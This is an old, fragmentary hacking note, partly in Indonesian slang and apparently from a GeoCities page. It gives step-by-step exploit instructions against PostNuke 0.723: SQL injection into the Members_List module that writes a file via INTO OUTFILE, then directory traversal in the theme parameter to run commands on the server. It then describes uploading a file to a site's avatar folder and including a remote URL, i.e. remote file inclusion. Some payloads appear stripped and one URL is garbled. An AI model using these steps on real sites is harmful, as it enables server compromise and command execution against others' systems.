ide asal na tuh sebenar na dari ini..

requirement:
   - PostNuke v0.723 maybe other 
   - PostNuke user
   - Mysql user must have permision to select into outfile (FILE_PREV)

1) Register as postnuke user.

2) Login as user you just registered. After login change your "Real name" 
   to something like "" or just 
""

3) Sql injection in "Members_List" modules.
   Select user information into /tmp/theme.php
.
   http://[postnuke 
site]/modules.php?op=modload&name=Members_List&file=index&letter=[your 
username]&sortby=uname+into+outfile+'/tmp/theme.php'%23

4) Directory traversing in $theme variable
   Run command on server
   
   http://[postnuke 
site]/index.php?theme=../../../../../../../../tmp&cmd=[command]

terus ketemu ada web yg isa upload
aku upload file yang dalamnya tuh


kok isa masuk...
terus aku carifoder penyimpanan file na pake properties...
ketemu na di
www.target.com/image/avatar/public/file.jpg
terus tak sambung

www.target.com/image/avatar/public/file.jpg=id

tapi isa juga file nya

ntar inject na 

www.target.com/image/avatar/public/file.jpg?ijoo=http::/injectmu.com..

    Source: geocities.com/ijookeren/xxx

               ( geocities.com/ijookeren)